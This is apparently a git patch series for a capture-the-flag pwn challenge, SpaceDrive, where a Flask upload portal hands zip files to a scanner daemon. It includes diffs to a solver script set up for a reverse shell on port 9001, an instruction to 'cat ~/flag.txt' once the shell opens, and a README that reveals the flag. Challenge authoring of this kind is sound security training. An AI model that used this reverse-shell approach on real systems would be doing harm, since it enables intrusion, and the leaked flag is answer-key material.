Using this portal, you can securely transmit files to our satellites from anywhere on Earth. 🌏

+ +

Note: Submitted files will be scanned to detect malicious patterns. Our team has developed a + specific tool to scan zip files.

+ + + + +
-
-
+ +
+ 🚀🚀🚀 +
\ No newline at end of file diff --git a/src/webapp/templates/upload_status.html b/src/webapp/templates/upload_status.html new file mode 100644 index 0000000..c9792df --- /dev/null +++ b/src/webapp/templates/upload_status.html @@ -0,0 +1,17 @@ + + + + + + Upload Status + + + +
+
+ {{ message }} +
+ Go back to upload page +
+ + From 2fa66f3860c7444712016e69b75fb84ee748a828 Mon Sep 17 00:00:00 2001 From: atxr Date: Tue, 5 Mar 2024 11:27:36 +0100 Subject: [PATCH 08/10] Start mineziperd from app --- Dockerfile | 6 ++---- solve/solve.py | 2 +- src/webapp/app.py | 17 ++++++++++++++--- 3 files changed, 17 insertions(+), 8 deletions(-) diff --git a/Dockerfile b/Dockerfile index ddea988..dba7866 100644 --- a/Dockerfile +++ b/Dockerfile @@ -4,19 +4,17 @@ RUN apt update && apt install python3-pip ncat -y RUN useradd -m -s /bin/bash user -# USER user +USER user WORKDIR /home/user COPY dist/mineziperd . COPY src/webapp webapp COPY flag.txt . -RUN ./mineziperd & - WORKDIR /home/user/webapp RUN pip install -r requirements.txt EXPOSE 5000 ENV FLASK_APP=app.py -CMD ["flask", "run", "--host", "0.0.0.0"] +CMD ["python3", "-m", "flask", "run", "--host", "0.0.0.0"] diff --git a/solve/solve.py b/solve/solve.py index 01a091c..b1d25d2 100644 --- a/solve/solve.py +++ b/solve/solve.py @@ -13,7 +13,7 @@ port = 5000 url = f"http://{ip}:{port}/upload" # Reverse shell params -ip = "127.0.0.1" +my_ip = "127.0.0.1" my_port = 9001 diff --git a/src/webapp/app.py b/src/webapp/app.py index 056b788..86e8387 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -3,6 +3,8 @@ import socket from struct import pack, unpack import hashlib import sys +import time +import os PORT = 8989 @@ -27,9 +29,18 @@ def upload(): hash = hashlib.sha256(buf).digest() # Scan file - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(10) - s.connect(("localhost", PORT)) + while True: + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(10) + s.connect(("localhost", PORT)) + break + + except: + print("Restarting mineziper service", file=sys.stdout) + os.system("killall mineziperd") + os.system("~/mineziperd &") + time.sleep(1) s.send(pack("I", len(buf))) s.send(buf) From f9d73bfb687c22c73d5c6a45b2388687413da3b0 Mon Sep 17 00:00:00 2001 From: atxr Date: Tue, 5 Mar 2024 11:57:05 +0100 Subject: [PATCH 09/10] Add more generic params --- solve/solve.py | 5 +++-- src/webapp/app.py | 4 ++-- src/webapp/static/styles.css | 6 ------ 3 files changed, 5 insertions(+), 10 deletions(-) diff --git a/solve/solve.py b/solve/solve.py index b1d25d2..077d9af 100644 --- a/solve/solve.py +++ b/solve/solve.py @@ -8,12 +8,12 @@ import zipfile ############## # Victim params -ip = "127.0.0.1" +ip = "X.X.X.X" port = 5000 url = f"http://{ip}:{port}/upload" # Reverse shell params -my_ip = "127.0.0.1" +my_ip = "X.X.X.X" my_port = 9001 @@ -127,6 +127,7 @@ with open("payload.zip", "wb") as zipf: print("payload.zip patched") print("You can start listening on port ", str(my_port)) +print("Once you get the shell, `cat ~/flag.txt`") input("Press any key when you are ready...") print("Sending payload...") diff --git a/src/webapp/app.py b/src/webapp/app.py index 86e8387..dc03205 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -38,9 +38,9 @@ def upload(): except: print("Restarting mineziper service", file=sys.stdout) - os.system("killall mineziperd") + os.system("pkill mineziperd") os.system("~/mineziperd &") - time.sleep(1) + time.sleep(5) s.send(pack("I", len(buf))) s.send(buf) diff --git a/src/webapp/static/styles.css b/src/webapp/static/styles.css index bfad1c0..53ebb70 100644 --- a/src/webapp/static/styles.css +++ b/src/webapp/static/styles.css @@ -26,12 +26,6 @@ form { text-align: center; } - - - - - - /* Hide the default file input button */ input[type="file"] { display: none; From 3de61a11fcd4661ee0a49ff653c9a54c0add49f5 Mon Sep 17 00:00:00 2001 From: atxr Date: Tue, 5 Mar 2024 12:11:45 +0100 Subject: [PATCH 10/10] Add challenge description --- README.md | 20 +++++++++++++++++++- flag.txt | 2 +- 2 files changed, 20 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 02ea339..ec4d066 100644 --- a/README.md +++ b/README.md @@ -5,4 +5,22 @@ ```bash sudo docker build -t chall . sudo docker run --rm -p 5000:5000 -it chall -``` \ No newline at end of file +``` + +## :triangular_flag_on_post: Challenge Informations + + + +| **Title** | Notebook | +| ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| **Category** | pwn | +| **Description** | To upload the firmware updates to our satellites, we deplopped SpaceDrive, a safe file uploader across the stars. Because we experienced many issues with malicious ZipFiles in the past, our security team also developped a zip scanner to detected embeded malware. Will you be able to break it to take control of the satellite? | +| **Author** | atxr | +| **Difficulty (/10)** | 8 | +| **Is Remote** | Yes | +| **Has attachments** | Yes | +| **Estimated solve time** | ~2h | +| **Solve instructions** | First modify the victim/attacker ip in `solve/solve.py`. Then `cd solve && python3 solve.py` and follow the instructions | +| **Flag** | **`THCon{WH3N_y0U_4N7iVIrus_IS_4C7U4LLY_4_84cKd00R}`** | +| **Deploy** | `sudo docker build -t spacedrive . && sudo docker run --rm -p 5000:5000 -it spacedrive` | + diff --git a/flag.txt b/flag.txt index b1cd7ba..02e6956 100644 --- a/flag.txt +++ b/flag.txt @@ -1 +1 @@ -THCon{Coucou} \ No newline at end of file +THCon{WH3N_y0U_4N7iVIrus_IS_4C7U4LLY_4_84cKd00R} \ No newline at end of file